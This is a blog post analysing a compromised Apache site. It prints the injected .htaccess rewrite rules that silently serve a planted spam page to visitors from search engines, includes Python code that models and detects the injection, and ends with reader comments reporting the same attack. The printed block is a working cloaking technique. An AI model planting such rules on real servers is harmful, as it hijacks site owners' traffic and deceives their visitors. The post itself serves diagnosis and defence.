Apache Criminals

So the problem is solved. Huzzah and hoorah.

But it’s a weird one. Someone pointed out that, after a bit of packet sniffing, the dodgy pages appeared to be coming from the genuine IP address, not from some third party. So while the first reaction of any technologist is to blame everyone and anyone else, maybe, just maybe, that was a little hasty.

So, out comes PuTTY, and a quick look round the document root for that domain later and … that’s odd. The .htaccess file has been changed far more recently than I would have expected (and it’s a little bigger than I remember).

8 -rw-r--r-- 1 lowfield users 4961 Oct 24 00:46 .htaccess

Odd, though, because the permissions (644) mean only the owning user, lowfield, should be able to write to that file. So whatever changed it must have been running as that user or as root; 644 offers no protection at all against a process that already has the owner’s identity.

But there it is, hidden away and padded out with a long run of whitespace so that a casual look at the file shows nothing unusual:

# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <54
RewriteRule ^.*$ /ctte/elire/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

For the benefit of those not fluent in the arcane ways of RegExp and the Apache RewriteEngine, this was checking four things: that you’d arrived from one of the listed search engines (case-insensitively, hence the [NC]); that the referring URL carried a search-query parameter such as q=; that the query did not contain an encoded colon or double quote (%3A or %22), so site: and "quoted" searches, the kind a webmaster checking their own listing might run, were left alone; and that the server clock was in seconds 00–53 of the minute, which is roughly 90% of the time. If all four held, the RewriteRule served /ctte/elire/t.htm in place of whatever page was asked for, and [L] stopped any further rules. Note there is no [R] flag, so this is an internal rewrite rather than an HTTP redirect: the visitor’s address bar still shows the real URL, which is exactly why the packet sniffing pointed at my IP address.

Most times when you click on a link, your browser tells the new website where you came from in the HTTP Referer header (the misspelling is the official one), so this was using that to decide whether to swap the page. Typing in the address, as regular users and the site owner tend to do, or using a bookmark, sends no Referer at all, so those visitors failed the very first condition, saw the genuine page and were none the wiser.
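To make the four conditions concrete, here is the same decision chain transcribed into Python and run over a handful of made-up Referer headers. This is an added example, not anything from the original post or from the injected file itself; the regular expressions are copied from the block above, and the sample URLs (example.com, the search terms) are constructed for illustration.

```python
import re

# The four RewriteCond lines from the injected .htaccess block, transcribed
# verbatim. The unescaped dots match ANY character rather than a literal '.',
# so the engine check is looser than the attacker presumably intended.
SEARCH_ENGINE_RE = re.compile(
    r"^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|"
    r"yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|"
    r"wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|"
    r"terravista|gratis-ting|suomi24).",
    re.IGNORECASE,  # the [NC] flag
)
QUERY_PARAMS = (
    r"(q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|"
    r"search_word|buscar|text|words|su|qt|rdata)"
)
HAS_QUERY_RE = re.compile(r"[?&]" + QUERY_PARAMS + r"=")
# Operator or quoted searches: a %3A (':') or %22 ('"') inside the query value.
OPERATOR_QUERY_RE = re.compile(r"[?&]" + QUERY_PARAMS + r"=[^&]+(%3A|%22)")


def would_redirect(referer, time_sec):
    """Return True if the injected rules would serve /ctte/elire/t.htm.

    `referer` is the raw Referer header as Apache sees it (None when the
    browser sent none, e.g. a typed URL or bookmark); `time_sec` is the
    server clock's seconds field, 0-59, as %{TIME_SEC} reports it.
    """
    if referer is None:
        referer = ""          # Apache treats a missing header as empty
    if not SEARCH_ENGINE_RE.search(referer):
        return False          # not from a listed search engine
    if not HAS_QUERY_RE.search(referer):
        return False          # no search-query parameter in the URL
    if OPERATOR_QUERY_RE.search(referer):
        return False          # negated condition: skip site:/"quoted" searches
    # mod_rewrite's '<' is a lexical (string) comparison; it works here only
    # because %{TIME_SEC} is always two zero-padded digits.
    return "%02d" % time_sec < "54"


def hit_fraction():
    """Share of each minute during which a matching visitor is cloaked."""
    hits = sum(1 for s in range(60)
               if would_redirect("http://www.google.com/search?q=apache+htaccess", s))
    return hits / 60.0


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    samples = [
        ("http://www.google.com/search?q=apache+htaccess", 10),      # cloaked
        ("http://www.google.com/search?q=apache+htaccess", 57),      # same visit, 47 s later: real page
        ("http://www.google.com/search?q=site%3Aexample.com", 10),   # webmaster-style search: real page
        ("http://www.google.com/search?q=%22apache+htaccess%22", 10),  # quoted search: real page
        ("http://www.example.com/search?q=apache+htaccess", 10),     # not a listed engine
        (None, 10),                                                  # typed URL or bookmark
    ]
    for ref, sec in samples:
        outcome = "t.htm" if would_redirect(ref, sec) else "real page"
        print("%-58s sec=%02d -> %s" % (ref, sec, outcome))
    print("cloaked %.0f%% of each minute" % (100 * hit_fraction()))
```

The negated third condition is the part worth noticing: it is what let the author search for his own site with site: and see nothing wrong, and the clock check gives the attacker a 10% miss rate to blame on caching or coincidence if anyone does complain.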

And, to compound the ignominy, the dodgy page itself (the /ctte/elire/t.htm of the rule above) had been written onto my own server, tucked into a sub-directory off the main directory. So it really was my site serving it.
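A check for exactly this pattern, added here as an example and not the author’s own tooling: audit each .htaccess for blank-line padding, for comment lines consisting only of 32 hex characters like the ones bracketing the block above (they look like markers the injector uses to find its own block again, but that is an inference, not something the post confirms), for a Referer-plus-clock pair of conditions, and for a catch-all RewriteRule pointing at a single static .htm file; then list everything under the document root modified recently, which is how you find the planted page, new folders and any rewritten script files. The two sample .htaccess bodies are constructed, with an abbreviated engine list, and the thresholds are my own choices.

```python
import os
import re
import sys
import time

# Heuristics derived from the injected block in the post. The thresholds and
# pattern lists below are this example's choices, not anything the post specifies.
HEX_MARKER_RE = re.compile(r"^\s*#\s*[0-9a-f]{32}\s*$", re.IGNORECASE)
REFERER_COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.IGNORECASE)
TIME_COND_RE = re.compile(r"^\s*RewriteCond\s+%\{TIME_", re.IGNORECASE)
REWRITE_RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.IGNORECASE)
CATCH_ALL_PATTERNS = {".*", "^.*$", "^(.*)$", "(.*)", "^"}
BLANK_RUN = 4  # this many consecutive blank lines before a directive counts as padding


def audit_htaccess(text):
    """Return (code, line_number) findings for one .htaccess body.

    padding             a non-blank line follows BLANK_RUN or more blank lines
    marker              a comment consisting only of 32 hex characters
    catch_all_to_static every URL rewritten to a single .htm/.html file
    referer_time_cloak  HTTP_REFERER and TIME_* conditions in the same file
    """
    findings = []
    blanks = 0
    referer_line = time_line = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blanks += 1
            continue
        if blanks >= BLANK_RUN:
            findings.append(("padding", lineno))
        blanks = 0
        if HEX_MARKER_RE.match(line):
            findings.append(("marker", lineno))
        if REFERER_COND_RE.match(line) and referer_line is None:
            referer_line = lineno
        if TIME_COND_RE.match(line) and time_line is None:
            time_line = lineno
        m = REWRITE_RULE_RE.match(line)
        if m and m.group(1) in CATCH_ALL_PATTERNS and re.search(r"\.html?$", m.group(2)):
            findings.append(("catch_all_to_static", lineno))
    if referer_line is not None and time_line is not None:
        findings.append(("referer_time_cloak", max(referer_line, time_line)))
    return findings


def scan_docroot(root, max_age_days=7):
    """Audit every .htaccess under `root` and list recently modified files.

    Caveat: mtime is what `ls -l` shows and an attacker can reset it with
    touch, so an old timestamp is not proof a file is untouched.
    """
    cutoff = time.time() - max_age_days * 86400
    report = {"htaccess": {}, "recent": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue
            if name == ".htaccess":
                with open(path, "r", errors="replace") as fh:
                    report["htaccess"][path] = audit_htaccess(fh.read())
            if st.st_mtime >= cutoff:
                stamp = time.strftime("%Y-%m-%d %H:%M", time.localtime(st.st_mtime))
                report["recent"].append((path, stamp))
    return report


# Constructed sample: a benign preamble, 40 lines of padding, then the injected
# block from the post with the search-engine list abbreviated.
INJECTED_SAMPLE = (
    "Options -Indexes\n"
    "ErrorDocument 404 /404.html\n"
    + "\n" * 40 +
    "# a0b4df006e02184c60dbf503e71c87ad\n"
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo). [NC]\n"
    "RewriteCond %{HTTP_REFERER} [?&](q|query)=\n"
    "RewriteCond %{HTTP_REFERER} ![?&](q|query)=[^&]+(%3A|%22)\n"
    "RewriteCond %{TIME_SEC} <54\n"
    "RewriteRule ^.*$ /ctte/elire/t.htm [L]\n"
    "# a995d2cc661fa72452472e9554b5520c\n"
)

# Constructed sample: a legitimate file with an HTTPS redirect and one moved page.
CLEAN_SAMPLE = (
    "Options -Indexes\n"
    "RewriteEngine On\n"
    "RewriteCond %{HTTPS} off\n"
    "RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]\n"
    "RewriteRule ^old\\.html$ /new.html [R=301,L]\n"
)

if __name__ == "__main__":
    for label, body in (("injected", INJECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, audit_htaccess(body))
    if len(sys.argv) > 1:  # e.g. python audit.py /home/lowfield/public_html
        report = scan_docroot(sys.argv[1])
        for path, findings in report["htaccess"].items():
            print(path, findings or "ok")
        for path, stamp in sorted(report["recent"], key=lambda r: r[1]):
            print(stamp, path)
```

Run against a document root, it prints one line per .htaccess with its findings and then every recently touched file, oldest first; the planted sub-directory and page show up in that second list even when the rewrite rules have already been cleaned out.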

Seems like I wasn’t the only one either; this is a very similar description and, whaddya know,


3 thoughts on “Apache Criminals”

  1. Romano says:

    Hi Chris,
    On our site we encountered the same problem. I found your blog by googling on the ip address you mention in the problem statement. Took us a few days to figure out what happened. And as you say, we’d very much like to know how in the h^&%ll they changed our htaccess file?!?! Besides that they also changed a number of javascript files where they also included a redirect to this spam site of theirs. Did you ever find out how these hackers entered your site?

    Also noticed that when the spam site loaded it showed in the status bar a reference to peakclick.com, apparently an organization offering affiliate earnings. I called them in Vienna, the girl on the phone said someone would call me back, but alas, no answer yet…

    Very anxious to learn more on how to close the door on these folks for good.

    Best regards,
    Romano


  2. ecbb says:

    Hey there guys. Same problem on my site. Found it in the htaccess file. Left with question: how did this happen? what was compromised?

    Ever figure it out?


  3. Romano says:

    These f%^&cks have returned now a few days in a row, messing up other stuff each time. Don’t forget to check for new folders and hacked CSS/JavaScript files.

    Meanwhile we’re working on it.

